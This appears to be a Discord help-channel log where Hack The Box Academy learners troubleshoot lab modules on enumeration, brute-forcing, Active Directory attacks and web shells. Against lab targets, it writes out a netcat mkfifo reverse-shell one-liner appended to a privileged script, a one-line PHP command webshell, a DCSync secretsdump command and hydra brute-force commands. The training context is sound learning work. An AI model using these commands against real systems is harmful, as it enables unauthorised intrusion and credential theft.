#modules

1 messages · Page 320 of 1

storm elk
#

WE don't know/care

daring nebula
#

crime can you help me pleasese i cant talk in general chat i odonkt know why

daring nebula
daring nebula
storm elk
daring nebula
daring nebula
shut vapor
#

I see it. Cracking into HTB is the path (a collection of modules) then the module / section is Getting Started > Service Scanning:
In this lab a simple "nmap -sV $RHOST" should net you results so it's likely a technical issue. Restart the lab and your VPN is my only suggestion.

fathom pendant
#

Did you install the requirements?

cedar zinc
#

yes

fathom pendant
#

Also /api isn't the endpoint

#

The web fuzzer fuzzes for endpoints

#

So drop the /api at the end, that's likely causing issues

#

Oh nvm I see you tried that

cedar zinc
#

I did bro... I tried everything

fathom pendant
#

It looks like the error as well is more in your python environment than it is with the tool

cedar zinc
#

can I DM you for this problem ? or we can talk here ?

fathom pendant
#

I genuinely didn't have any issues running it (my python env is 3.11)

cedar zinc
#

same.. my system is upto date

fathom pendant
#

¯_(ツ)_/¯

cedar zinc
#

Let me try again... with some changes

fathom pendant
#

Try doing it in the pwnbox see if the issue persists

tender radish
#

i have a problem sshing in a module

#

/module/115/section/1105

#

it says no route to host. i tried reseting the machine

fathom pendant
#

What's the actual module and section name

tender radish
#

shells and payloads / bind shells

fathom pendant
#

No route to host generally means you don't have the vpn running

tender radish
#

it is running

#

let me reset that too

fathom pendant
#

Are you running it in the vm?

tender radish
#

yes

#

i always had, first time that something is not working

#

can't even nmap it, so yeah might be something from the vpn, let me get a new conf

#

yeah, works now, thanks

primal harbor
#

hi i have problem with who can help me

#

secretsdump.py -outputfile inlanefreighthashes -just-dc-user syncron INLANEFREIGHT/adunn@172.16.5.5 it is not work

#

DCSync AD

azure wharf
#

I try to connect to the Server with the Command:
mysql -u robin -probin -h 10.129.19.20
but i got no connection bebause this:
ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain
What can i do. I tried to google it but i cant find any solution.

#

Sorry i am in MySQL Footprint

quiet trout
#

did u specify port?

quiet trout
#

may be inconsequential but definitely do a sanity check

shut vapor
#

You could manpage mysql client to see if there's a flag to ignore SSL.

azure wharf
#

thanks i will try this

runic talon
#

I try to do evilwinrm over proxychains with PTH. I have the right hash and creds, and i have configured an ssh tunnel before hand. However i keep getting denied, any idea why

forest minnow
#

I really at a loss with the firewall evasion - hard lab in the nmap module. I've followed the examples (apparently that's the solution) and yet it just doesn't work.

||The target port is showed open when nmaping with source port 53, and yet ncat shows "connection refused" using that same source port.||

I don't get it.

shut vapor
forest minnow
#

Nevermind. I forgot to use sudo with ncat 🤦‍♀️

#

And I was on it for hours. I've juste realized that the error message I got was not from the target, but from my VM.

valid nebula
#

Hi @jaunty mortar , I have the same issue ... did you receive some help ? I'm stuck for 2 weeks ... I bypass the filter via object and base64 but can trigger admin content. Can you help me ?

floral crow
#

Looking for help on the Web service & API attacks skills assessment. I have got the properly formatted XML document, and sent it to burp via the python automate script. In repeater I got it to return in the SQLI payload with a user with the password, I tried submitting the payload with admin and the password, but am not getting anything. Am I missing something , or do I need to submit a different payload that will spit out the flag?

crimson eagle
edgy nexus
#

I just started doing sherlocks, and wanted to play around with splunk for unit42 for some reason i cant import the event logs. Anyone had this issue before? Running linux for the sake of learning that while doing sherlocks so i wanna avoid using the windows event viewer

tranquil axle
frank sun
digital vessel
#

this is not a question bout the answer answer its a question bout names
https://academy.hackthebox.com/module/57/section/516

the LAST question
skillss assessment.
||
it had been talking about harry potter the WHOLE time but the name they use is harry.potter not harry potter

it says from the question before but that was not the name from there ether. that one again was harry potter. ||

HOW am i suppose to know this. per name said something like it would take 98 HOURS to do. the vm only stays up 90 min lol
where why and how did the dot get there ?

somebody get back to me maybe i missed this with out a walkthough it would hhave taken weeks to months if ever to find this.

#

it does say "Also, try using the 'username-anarchy' tool to generate potential usernames for the employee" but that gives me a few hundred i legit dont have the time for that

shut vapor
digital vessel
#

im more asking if it has to be listed or if i missed it.

digital vessel
shut vapor
#

You would use username-anarchy to create a plausible list of login ID's from just names (e.g. harry potter = hpotter, potterh, harry.potter, etc.) then you would have a narrow list of guesses for further attacks rather than a gigantic, generic list of usernames.

#

I can see the confusion if they haven't covered any other means of validating user lists / attacking passwords yet.

#

It is the skills assessment though. What if you just ran the name list & a password dictionary through an automated login tool? It might be hundreds of combinations, but AFAIK that's the way its done.

#

Again, I'm not there yet so you might be onto something. I'm just talking from my current POV.

digital vessel
shut vapor
#

You'll have to wait for someone else to speak up. I can't say you're wrong, but I suspect there's got to be a way of automating the process.

digital vessel
#

well making the list and testing each name i understand the concept just not how im suppose to finish in 90 min XD i also get the password part even thin down the list per there instructions it would still take months. the only way i got it done was the walkthough to get the name then just did the assignment as i kept running out of time.

#

per name even on the smaller list is something like 1 hour to 8 hours i forgot now but its looong.

dim wolf
#

how are you testing usernames

fathom pendant
digital vessel
digital vessel
fathom pendant
#

You don't have to "test each username"

silent sleet
#

Module - Advanced NTLM Relay Attacks Targeting AD CS

Curious what you guys are doing to get around this error? I've run into it several times and have always been able to use passthecert.py to get around it, wondering what other ways there are? I also tried what HTB suggested with npupdate

fathom pendant
#

Hydra has a switch that says to loop through usernames instead of passwords

dim wolf
#

i forget the skills assessment but you should be able to determine the right one pretty quickly

fathom pendant
#

It doesn't take long for it to find the right password and username

digital vessel
fathom pendant
digital vessel
#

in the prev section it just gives you the name the one after you get part of a name though burp

#

yes its the last

fathom pendant
#

The username list can be looped through instead of password list, -u

#

Takes significantly less time

digital vessel
fathom pendant
#

No 🗿

digital vessel
#

okay dokay sorr to bother you

fathom pendant
#

But fr you just throw the name at username-anarchy

#

Also: expected time != actual time

#

The expected time is the theoretical time to go through both lists

#

It doesn't magically know your user/pass

#

It's saying; "if we go through the whole list, it will take that long"

digital vessel
#

but fr i get 100's of names . again thus is the issue i didnt get so it has to do each name + pw so im looking into this -u you are talking about

fathom pendant
#

All it does is loop through the username list instead of password list

#

So it goes username{1..X}:password1
Instead of
username1:password{1..200}

rustic sage
#

Hello

#
+ 1 Build an XML query to determine if the previously mentioned executable modified the auditing settings of C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll. Enter the time of the identified event in the format HH:MM:SS as your answer.```
digital vessel
fathom pendant
#

Your post contained the answer to the previous question @rustic sage thats why it was deleted

rustic sage
#

It doesnt work

#

Its not an answer

#

Plus

#

Read it carefully

#

Enter the time of the identified event in the format HH:MM:SS as your answer. --This is what the answer is supposed to be

#

Can I please have help without my stuff being deleted? Please? I just want some help

fathom pendant
#

It contained the answer to the previous question :)

rustic sage
#

Im confused?

#

OH

#

Wait, where?

fathom pendant
#

Anyway you'll need an AND query

fathom pendant
rustic sage
#

Was that in the query? Ill have to double check

#

Sorry for putting it here!

fathom pendant
#

It was in what you posted

#

💀

#

I also don't believe you need to narrow it down to a specific log type

rustic sage
#

Instead of searched for the event.code im going to search for the .dll alone.

#

Yeah

fathom pendant
#

Yep

quiet trout
#

im doing the BBH -> SQLMAP -> SQLMAP on HTTP REQs module

https://academy.hackthebox.com/module/58/section/517

and the lab has 11 cases to complete, only 4 are are flagged, the others, the 5th im currently on, is requesting us to exploit a OR injection with GET request, and im having trouble getting sqlmap to do this... it seems to start out with an AND and go no further... plugins were not discussed in the module.

quiet trout
#

case $5

#

#5 only say that to say im actually trying to learn this stuff so im doing all the cases regardless of whether a flag is required.

rustic sage
#

@fathom pendant Thank you for trying to help! I really appreciate it. I'm glad you caught on to my posting of one of the answers, I wouldn't have of caught it, so thank you! I figured it out. I just constructed an XML query to find the .dll file. I used ChatGPT to construct it 🙂

fathom pendant
quiet trout
#

let me double check my link right quick. its on the targets web server

#

oh i see what you're saying yeah its not a flag, its on a list of 11 cases on the target webserver, only 3-4 of them are flags, im actually trying to learn this so i want to complete them all

digital crown
#

Module: Linux privilege escalation
Section: Docker
I have problem with solving this module. I don't really understand even how to start with this thing. I'm assuming I should run this docker instance on the host target, but how do I find docker image file? Besides that I was only able to run

docker -H unix:///run/docker.sock ps

command instead of

docker -H unix:///app/docker.sock ps

because it prompted me about docker not being active

fathom pendant
#

#5 is on the attack tuning session

quiet trout
#

is that gonna be the next section?

fathom pendant
quiet trout
#

oh i see

#

thx marcie.

fathom pendant
crisp nacelle
#

does htb academy now only accepts credit card for payment?

digital crown
#

i thought it'll list available docker instances

fathom pendant
#

Hold on

fathom pendant
digital crown
#

oh

#

thanks for that. is the command difference caused by other distro or something?

fathom pendant
#

Also is docker.sock in that location?

#

:)

digital crown
fathom pendant
#

Look at the exact things; it's showing the command running on a port

#

It's not showing the containers that are running

digital crown
#

okay thanks!

pine phoenix
#

Hey guys is there a ticket system to report a bug/issue?

fathom pendant
viral lotus
#

I have tried looking above but couldn't see too much when I searched. I am on the information gathering - DNS Zone Transfers.. How much am I allowed to disclose? I am stuck on the first question I run dig against the inlanefreight.htb (added to my /etc/hosts file) I only get one DNS back, I went to the zonetransfer.me site just to get some more guidance. Other than watching some DNS Zone Transfer Content to understand it is there anything else I can do? I have attached my initial try

fathom pendant
viral lotus
#

ok no worries, I will try finding some more education pieces and try again

fathom pendant
#

Zonetransfer.me is a website to demonstrate zone transfers with its not actually something you need to query for this. It was being used in the section for demonstration purposes only

#

The dig syntax is
dig axfr domain @ip/nameserver

viral lotus
#

Gotcha thanks

#

Think I need to do some more education on it.. at least I know what I was doing was wrong

fathom pendant
#

Just gotta separate example from what you need to do

viral lotus
#

yeah when I read the digi ninja site it literally says to use as an example. Ok, thanks anyway. I will park it for the moment. I'll get more familiar before I ask again

limpid hemlock
#

Hey im doingatacking wordpress section the question to find to find another user present against blog.inlanefreight.local . I ran /etc/passwd to find anyuser leveraging a command execution vulnerability from a plugin but i cant seem to find the user any tips

digital vessel
#

ok so part of my problem was anarchy didn't generate names but said it did. was givng me empty files (this explains A LOT )

still does not help speed this up

[DATA] attacking ssh://iphere:porthere/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 3340 to do in 00:42h, 10 active
[STATUS] 70.00 tries/min, 210 tries in 00:03h, 3210 to do in 00:46h, 10 active  ``` but guess i will give it like 20 min see what happens
fathom pendant
digital vessel
#

but names were blank files

fathom pendant
digital vessel
#

i removed it replaced it and now it works fine no idea why how it broke tho

digital vessel
# fathom pendant ¯\_(ツ)_/¯

i doubled check and i was doing -u i was confused about the looping part you were talking about as i was doing that but i mean i see now why it didnt work

fathom pendant
digital vessel
#

[STATUS] 65.71 tries/min, 460 tries in 00:07h, 2960 to do in 00:46h, 10 active

this is min not hours right?

fathom pendant
#

Yea

#

I believe so at least kek

digital vessel
#

welp back in 30 min or so 🤓 see if it worked or not other wise im still in the " how do i have time for this" area

fathom pendant
#

I think it's displayed as HH:MMh

full patio
#

https://academy.hackthebox.com/module/112/section/1069 I am working on this module - Footprinting -> DNS -> What is the FQDN of the host where the last octet ends with "x.x.x.203"?

For some reason, I can't seem to get the answer. I've tried ||inlanefreight.htb & internal.inlanefreight.htb||

What am I missing?

||dnsenum --dnsserver 10.129.121.184 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt internal.inlanefreight.htb
dnsenum VERSION:1.2.6

----- internal.inlanefreight.htb -----

Host's addresses:


Name Servers:


internal.inlanefreight.htb NS record query failed: REFUSED||

fathom pendant
#

As you see it said it did work in 00:07h (7 minutes)

digital vessel
#

75 mine on the box 45 min to pw (im guessing)

digital vessel
fathom pendant
digital vessel
#

its a old alienware its all i got for a hackbox so the videocard is utter trash dont judge me

fathom pendant
#

Dude

#

I'm running on an i5 7500U, with a 1050ti gfx card

#

Also the video card wouldn't matter for this

#

As you're not cracking a hash

#

You're bruteforcing a password

fathom pendant
#

iirc wp-users is where users may be

digital vessel
fathom pendant
#

Either way gfx card isn't a factor here

limpid hemlock
dire abyss
#

is HTB okay right now? cant rdp from my vm, cant start pwnbox

#

nvm im an idiot

digital vessel
#
[STATUS] 70.00 tries/min, 210 tries in 00:03h, 3210 to do in 00:46h, 10 active                      
[STATUS] 65.71 tries/min, 460 tries in 00:07h, 2960 to do in 00:46h, 10 active                      
[STATUS] 64.00 tries/min, 960 tries in 00:15h, 2460 to do in 00:39h, 10 active                      
[STATUS] 62.81 tries/min, 1947 tries in 00:31h, 1473 to do in 00:24h, 10 active                     
[STATUS] 62.75 tries/min, 2259 tries in 00:36h, 1161 to do in 00:19h, 10 active                     
[STATUS] 62.39 tries/min, 2558 tries in 00:41h, 862 to do in 00:14h, 10 active                      
[STATUS] 62.24 tries/min, 2863 tries in 00:46h, 557 to do in 00:09h, 10 active                      
[STATUS] 62.35 tries/min, 3180 tries in 00:51h, 240 to do in 00:04h, 10 active                      
1 of 1 target completed, 0 valid password found                                   ```  i know im doing this right and i know the name and pw are in there so im missing something but im done for today / rn.
fathom pendant
#

question

#

for the password portion

#

did you allow it to l33t?

#

and add characters?

digital vessel
fathom pendant
#

:)

#

i mean

digital vessel
fathom pendant
#

i hope that's a typo

shut vapor
#

rofl

fathom pendant
#

-l is username whereas -L is the list

#

so you were literally passing 'username.txt' as the user

#

<@&861185840277487616>

dire abyss
#

the hell is a macherino

digital vessel
#

thats a 30 min type-0 error yup.. ya got me

#

i even have -L in my notes and put -l im special

dire abyss
limpid hemlock
#

Hey i got a shell into the domain in attacking wordpress section and i have command execution i got the uid command after that i type in many commands to find the flag none seem to work most returns me nothing

fathom pendant
digital vessel
#

wow that took 10 seconds im gonna go kick myself ☠️ when file was empt i used -L when file not empty i used -l
yeesh break time ty all

fathom pendant
#

O7

#

At least you were willing to go back and check yourself on it

#

Instead of claiming "lab broken" angryeyes

digital vessel
#

no i only had 1 broken lab so far

#

and it was confirmed broken

limpid hemlock
fathom pendant
#

Whats the exact wording of the question

limpid hemlock
#

Folloeing the steps in section obtain code ececuton on host and submit contents of the flag.txt file on webroot

fathom pendant
#

on the webroot

digital vessel
fathom pendant
#

There's your keyword there

limpid hemlock
#

I did ls /var/www/flag.txt

fathom pendant
#

Generally webroot is /var/www/html

limpid hemlock
#

And many such command but it returns me

dire abyss
#

idk mine might be broken lol jk but seriously target win box keeps kicking me out, connection aint stable i guess

limpid hemlock
#

Hdkdjsjsj-1384949.php

fathom pendant
#

Did you check /var/www in general?

limpid hemlock
#

cmd=ls /var/www/

#

Got nothing but that jiberish.php

fathom pendant
#

If there's vhosts at work: sometimes the webroot is /var/www/<vhost>/

#

¯_(ツ)_/¯

marsh echo
limpid hemlock
#

Did that too blog.inlanefreight.local

#

Still that jiberish.php

marsh echo
#

find+/+-name+"flag.txt"+2>/dev/null

fathom pendant
limpid hemlock
#

Darn forgot that +

fathom pendant
#

Yeah lol

limpid hemlock
#

Got the flag section done after 20 mintues of missing a +

marsh echo
limpid hemlock
#

I was very happy i got the shell in and cmd execution possible when i got uid

fathom pendant
#

Either + or %20

limpid hemlock
#

I thought this was done then LOL TOOK ME 20 MINUTES MORE

fathom pendant
#

Url encoding is great

marsh echo
#

it's true, I'm not used to it yet, but I have to be, because it's always there the %20

quiet trout
#

hey @fathom pendant ,

im still working that SQLmap module -> Attack tuning section (i just LOVE sql)...

https://academy.hackthebox.com/module/58/section/526

case #6 ... i already solved the prefix portion (manually) do you know if we were supposed to use risk/level to acquire the prefix?

if i understand it correctly, its supposed to fuzz sql vector boundaries but god it was taking so long... then in the solution it sorta acts like youre just supposed to know it before starting the sqlmap scan (along with utilizing the prefix)

fathom pendant
#

but the prefix stuff is just found in the reading

#

i'm sure there's some cheatsheet out there with common prefixes

quiet trout
#

the solution shows them utilizing the prefix stuff prior to the scan tho? maybe thats just a small content oversight?

#

like as though you're supposed to manually find it? dunno

fathom pendant
#

it's in the reading

#

afaik

quiet trout
#

yes it is, but it just sorta "appears" without explanation in the solution. i guess one can make a leap in logic, just want to be sure im approaching it how "it" wants

fathom pendant
#

¯_(ツ)_/¯

#

you just keep pivoting until the end

#

the last 2 questions are solved by the same machine

#

then dig for another set of creds

#

¯_(ツ)_/¯

#

each hop has unique creds

frosty ferry
#

it says to find shadow.bak but there is no such shadow.bak in that directory

fathom pendant
frosty ferry
fathom pendant
#

it is vf

frosty ferry
#

do i still need to ssh?

fathom pendant
frosty ferry
#

oh

fathom pendant
#

<click here to spawn target>

frosty ferry
#

got it

rustic sage
#

Is HTB openvpn academy 5 server down? I cannot connect to the VPN.

fathom pendant
#

¯_(ツ)_/¯

#

try a different region

rustic sage
#

@fathom pendant Thank you!

#

I have an error message from hydra, “all children were disabled “”

#

Anyone help me

#

I am stuck in attacking common service

fathom pendant
#

and the port stopped responding

rustic sage
#

How I can solve that??

fathom pendant
#

don't use as many threads

#

shrimple as

rustic sage
#

Without -t 64 ?

fathom pendant
#

yes

#

lmao

rustic sage
#

But not working

fathom pendant
#

If it's the mail services section that's wayyyyy too many

rustic sage
#

What I should do

fathom pendant
#

Wdym "not working"

rustic sage
#

The hydra itself

fathom pendant
#

That doesn't help at all

rustic sage
#

Yeah I am using port 25

fathom pendant
#

?

#

I assume you used smtp-user-enum to get a user@domain

rustic sage
#

I got the user already

#

But now I am working to find the password

fathom pendant
#

Yes and when bruteforcing for pw you don't include the @domain

#

From what I recall

rustic sage
#

I include it

fathom pendant
#

no

#

what i'm saying is you don't use @domain in your hydra command

#

so -l user without the @domain

rustic sage
#

I used that with the domain 👍🏻

fathom pendant
#

if you're attacking smtp, you do need to include the @ domain

rustic sage
#

I know that

#

I mean even though It is not working

fathom pendant
#

use rockyou

#

instead of the provided wordlist

rustic sage
#

This is my command : hydra -l fi****@inlanefreight.htb -P'/usr/share/wordlists/rockyou.txt.gz' -f 10.129.****smtp

#

But not working as I told you

acoustic solar
fathom pendant
#

is this the email section or the skill assessment

rustic sage
#

Not that the issue

#

Skill assessment

fathom pendant
#

if it's the skill assessment then you DON'T use the @domain

rustic sage
#

Why ?

fathom pendant
#

i was thinking you were on the Email section, since you didn't specify what you were doing

rustic sage
#

It is the same

fathom pendant
#

also go for imap://

#

instead

#

or another protocol

#

smtp may not have authentication enabled on this server

rustic sage
#

Okay!!!

#

I got it now

fathom pendant
#

@reef pecan the spider takes a long time and eventually finds it

#

please refrain from posting spoilers as well; from my understanding to make it faster -- you should first identify pages that may have input and spider/target those

#

instead of the website as a whole

#

which can take up to 30+ minutes

reef pecan
fathom pendant
#

yeah

pine dune
#

hi guys when i try to go to that address "files/shell.aspx" it doesnt work

#

and I cant remember how I did it previously but I dont think I understood it which is why I'm asking for clarification

fathom pendant
pine dune
#

okay let me try

fathom pendant
#

instead of single

pine dune
#

ok hold on

#

this comes up again

#

oh wait

#

I dont think I edited the file itself

#

😂

#

I dont seem to have the antak webshell, where can I download it from?

fathom pendant
analog dock
fathom pendant
#

first result on google

#

"Antak Webshell"

reef pecan
pine dune
pine dune
cold dome
#

Can you tell me as to why this command is not working?

nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

I'm getting:

/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
rm: cannot remove '/tmp/f': No such file or directory

#

I'm doing nibbles

#

Getting Started - Nibbles - Privilege Escalation

fathom pendant
#

do you get something in your listener when you run it though?

#

:)

#

also make sure you replace 10.10.14.2 with your tun0 IP

cold dome
#

Yeah that's what I did

#

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.156] from (UNKNOWN) [10.129.193.185] 58584

fathom pendant
#

then it's working

#

and you shouldn't concern yourself with the error presented

cold dome
#

oh ok

fathom pendant
#

basically though it's making sure if /tmp/f does exist, you're deleting it -- then making a pipe to it

#

specifically a first in first out [fifo] pipe

pine dune
#

I need to modify the antak shell with a username and password but htb doesnt provide it

cold dome
#

Thanks for clarifying.

fathom pendant
#

just make sure your ip and port are in it

#

where applicable

pine dune
#

thank u got to this page but its asking for a login

fathom pendant
#

the default creds are in the file

pine dune
#

also, why do we switch web shells? like why am I using antak webshell instead of laudenum

#

okay Ill check

pine dune
#

can someone please help me with this question and steer me in the correct direction

fathom pendant
#

if you haven't found the default creds, it's on line 12

pine dune
#

Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: ****\****, 1 space)

fathom pendant
#

whoami

#

the most universal command across lin/win

pine dune
#

ahh yes 😂

#

how could I forget tht 😂

#

thankss

fathom pendant
#

if your answer is wrong then you uploaded to the wrong vhost :) kek

#

(yes there IS a difference)

pine dune
#

nahh its correct hahaha

#

thank uu

fathom pendant
#

good thing you didn't lose more sanity over it

pine dune
#

😂

floral loom
#

[Help information gathering - web edition - Skill assessment]
Hello everyone, i'm having a hard time finding the API key, although I already have the full subdomain AND also the admin directory.
I can't access it via browse, nor via curl.
I have all the other flags, but this one is killing me. Anybody could help me, please?

fathom pendant
floral loom
fathom pendant
#

And you specified the port?

floral loom
#

yess

fathom pendant
#

Try with curl

#

Sometimes the browser can be dumb

floral loom
#

🤣 🤣 🤣 🤣

fathom pendant
#

Sometimes (for some reason) the browser drops the specified port

floral loom
#

Marcielee, I just realized I was the dumb one

fathom pendant
#

Ohno

floral loom
#

euiahsieuahsie

#

I used the wrong port

fathom pendant
floral loom
#

🤡

#

uiahsiuehasuh

fathom pendant
#

It do be like that

floral loom
#

thank you anyway, i wouldn't have noticed it kkkkk

unique ether
#

I'm losing my sanity

tender nimbus
#

Hey guys im on the footprinting module imap pop3 section, do someone know how i can see the content of an email when im in the imap server,

placid edge
unique ether
#

a FETCH 1 (BODY[TEXT]) Fetches only the body text of the first email.

unique ether
fathom pendant
fathom pendant
#

Body[]

#

Fetches all the email info fields

#

There is also in fact only 1 email

#

If you want to fetch all emails (if more) you could do a fetch * body[]

tender nimbus
#

But the thing is when i execute my command it deconnects me @placid edge

#

do i need to include the SELECT and the FETCH in one command?

rugged sonnet
#

hi goood afternoon to everyone.

I am trying to solve the following question:

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

I saw that there is a forum regarding this, but I still not understand the logic of it.

in the questions they are referring to "unique paths of domain" but I am not sure what this means.

i get that we neet to extract the html info of the page and filter. but what needs to be filtered is what I dont get

unique ether
rugged sonnet
#

I think I am missing some context of the website stuff that I dont know.

unique ether
fathom pendant
rugged sonnet
placid edge
#

if its pop3 you can just use retr (index) ex: retr 1

tender nimbus
placid edge
tender nimbus
#

||This is my command curl -k 'imaps://10.129.161.217' --user robin:robin -v -X 'SELECT DEV.DEPARTMENT.INT'||

placid edge
#

why are you using curl for this?

#

use telnet

vernal hedge
#

lol

fathom pendant
#

Yeah telnet is gonna be way better for this

pine dune
#

f

#

when I try to execute commands on the reverse shell it doesn wrk

#

anyone have any ideas?

fathom pendant
#

It's a webshell

pine dune
#

yeaa

#

why isnt it working 😅

ashen fiber
fathom pendant
#

It's unstable

pine dune
pine dune
fathom pendant
#

Did you copy the whole code to upload?

#

Change vpn regions, use tcp instead

pine dune
#

yeah its in a php file

#

damn ok

fathom pendant
#

@tender nimbus careful with posting flags dude

tender nimbus
fathom pendant
#

Spoiler doesn't do shit

#

As anyone can click and look at it

tender nimbus
#

here without it

fathom pendant
#

You don't need to wrap it in () btw

pine dune
fathom pendant
#

But the body without the square bracket just gives basic info about the message

fathom pendant
pine dune
#

may I ask why not and if u dont do them how do u know so much

fathom pendant
#

I just don't

pine dune
#

ahh ok

tender nimbus
#

okej so by doing body[1] i select the first message in the inbox?

fathom pendant
#

I read and a good portion of my knowledge comes from either modules or others

fathom pendant
#

You can do
a fetch 1 body[] and it'll do the same

placid edge
fathom pendant
tender nimbus
#

okej but imagine if a hive more messages in this inbox?

fathom pendant
placid edge
#

Looks like the webshell module thingy.

tender nimbus
#

then i need to specify so if i want to see the body of the third messgae i need todo BODY[3]

pine dune
#

now the website isnt loading 😦

pine dune
tender nimbus
#

ow okej thanks ^^

fathom pendant
#

As there's more stuff you can actually specify in the brackets

placid edge
#

As its a universal command compared to ls and id

pine dune
fathom pendant
#

It's a connection issue

placid edge
#

Ah alr. Im working of memory here so i might be wrong but i belive the backend is windows and not linux

ashen fiber
fathom pendant
#

It drops you into a .../www/.../ directory

placid edge
#

Ah alr

placid edge
#

Coolio.

fathom pendant
#

Ye I checked the module first to be sure

placid edge
ashen fiber
# pine dune yeaa

try to rename it like connectx.php and upload again. then try to access. ( works fine on me before)

pine dune
#

tcp is very slow...since i changed vpn servers its not working properly

tender nimbus
#

just asking question bcs its not the same in the module

placid edge
placid edge
tender nimbus
unique ether
#

Footprinting lab hard is it safe to say from the description the user is HTB?

placid edge
#

Just redact passords and spoilers

placid edge
#

If you need a user or its not a part of the challenge

tender nimbus
#

last question why cant i login here with telnet? how can i bypass the error message?

unique ether
#

I'm stuck lol

placid edge
#

Right port?

tender nimbus
#

or is it here needed to do it on port 993

placid edge
#

Looks like thats a imap port

tender nimbus
#

yes it is

#

but cant connect with the same credentials than on the secure port 993 but why is that?

placid edge
#

Are you conneting to pop3 or pop3s

#

Or imap or imaps

tender nimbus
#

imap

#

via telnet bcs for imaps its with openssl if im not wrong

pine dune
#

same problem

placid edge
#

Yeah but there should be a imap and imaps port

#

Two different ports

#

I belive

placid edge
pine dune
#

nah

#

turned it off

placid edge
#

Hmm weird

#

Tried reseting?

pine dune
#

yeah

#

when I enter a command thats the new url

feral fossil
#

hello

pine dune
#

Yo

feral fossil
#

You are hackers

pine dune
#

aspiring

#

me

placid edge
#

Instead of a webshell you could just upload a php system webshell and see if that works.

<?php system($_GET['cmd']); ?>

placid edge
#

Ye like test.php

pine dune
#

okay lt me try that

placid edge
#

And include ?cmd=whoami in the url parameter when you open the file

tender nimbus
placid edge
safe star
#

Use openssl

tender nimbus
tender nimbus
placid edge
#

Because it requires ssl/tls

tender nimbus
#

is it possible that somethimes there are services where we have acces to but where we cant have interaction with?

placid edge
#

You arent allowed to use imap

tender nimbus
placid edge
#

No. Depends on their security config

#

I mean running password over telnet over http is terrible

#

Or in this case imap

tender nimbus
#

Okej im not that far already to understand everything but thanks for you helps guys 🙂

pine dune
#

got an empty screen

placid edge
#

Yeah

#

But include ?cmd=whoami in the url

pine dune
#

ok let me try

#

something worked 😄

placid edge
#

You are the user apache

#

Now you have rce

#

Do ls now instead of whoami

pine dune
#

thanks i got it

pine dune
#

now im off to play some ea fc 24

placid edge
#

Sweet, prob a issue with the webshell or a cleanup script

pine dune
#

yeaa

placid edge
pine dune
#

if anyone plays on ps5 lmk and dm

gusty cloak
#

nevermind I am an idiot

cerulean hinge
#

I'm trying to finish the Skill Assesment part 1 of "Active Directory Enumeration & Attacks module" however i'm currently stuck while trying to upload a tool in my victim asset.
I have setup proxychains to access the victim asset with psremote. From there I want to wget the file from my attacker machine.
I tried with evil-winrm however I don't know why I just can't connect to the machine (the port is open though...)

unique ether
#

im so tempted to see solution

safe star
cerulean hinge
#

I need to setup it where ? I only setup the proxychains conf and launch chisel on the webserver that I had access to. Then I psremote to the victim asset for which I had an account that could log there

gusty cloak
safe star
#

thats what i was thinking but i think he said the upload isnt working

gusty cloak
#

I see

#

Upload chisel or another method to the attack host then upload it that way then you can port forward to your local machine

safe star
#

i dont use chisel but using netsh should work fine

gusty cloak
#

Yeah I prefer chisel but any of the methods will work

cerulean hinge
#

Anyway I found an other way to upload my file. I didn't know but with psexec.py you can upload a file. So I did it. Just still I don't understand why I can't evil-winrm into the host...

safe star
#

ligolo is the best

cerulean hinge
wanton idol
gusty cloak
cerulean hinge
#

proxychains4 evil-winrm -i IP -u USER.
I get this. I found that it may be due to the port being closed but from my nmap and netstat I found it to be open so I don't know

sonic plume
#

it seems like you put in the wrong credentials

cerulean hinge
#

I don't think so. The creds are valid for sure. And I tried several time with a copy and paste. I will try again

sonic plume
#

try put them inside double quotes

gusty cloak
#

Does xfreerdp work?

cerulean hinge
#

I didn't try xfreerdp and the lab is over now I didn't see the timeout xD. I will need to setup everything again

midnight basin
cerulean hinge
#

I need to check again I probablydid a mistake while doing my enumeration then

fickle topaz
#

Hello guys, please i cant connect to windows server via rdp. Module
Password Attacks:Pass the Ticket (PtT) from Windows

foggy monolith
#

** Attacking Common Services -> Attacking FTP **

Despite covering all bases with ||nmap -T4 -Pn -p- --disable-arp-ping -sCV <IP>|| there literally is nothing there as far as FTP is concerned. What am I missing?

#

Is --max-retries=0 a problem?

#

The only services on the box are SSH, DNS, NetBIOS, and SMB. FTP is nowhere to be found.

safe star
#

i just used nmap <ip> -v

#

and found it

foggy monolith
#

Nope. 22, 53, 139, 445 and nothing else.

safe star
#

try restarting it

jade latch
midnight basin
#

there are other ports ftp can run on

fickle topaz
foggy monolith
#

Found it after resetting though

safe star
#

normal nmap will find it

trim frost
#

sometimes you can also try adjusting -T parameter too

safe star
#

i think i guessed that answer too 😂

fickle topaz
#

how can i paste a screenshot here

next bronze
fickle topaz
#

ok

cloud urchin
#

timeout isn't a binary to connect to RDP afaik

#

ahh i see. try xfreerdp with /timeout:100000

#

also are you sure you're supposed to RDP into it?

next bronze
#

straight up unable to connect

cloud urchin
#

nah its timeout for the session, not for the connection

#

i reviewed the section i don't even see where they tell you to RDP in

#

unless it's just to the initial target

next bronze
#

ptt from windows? looks like you do need to rdp in

cloud urchin
#

verify correct vpn connection, maybe try xfreerdp or remmina

unique ether
#

Someone give me hint on footprinting hard I'm already in ssh trying to find the htb user now

frank sun
#

I tried possible combinations with -
servername\username, etc. none worked

cloud urchin
frank sun
#

like a local DB user?

cloud urchin
#

oh maybe not for that login now that i look at it

#

well it still says domain user maybe try local

frank sun
#

it will use Windows Authentication. If we are targetting a local account, we can use SERVERNAME\\accountname or .\\accountname.
well I tried again now with exact command, it worked. How? NotLikeThis

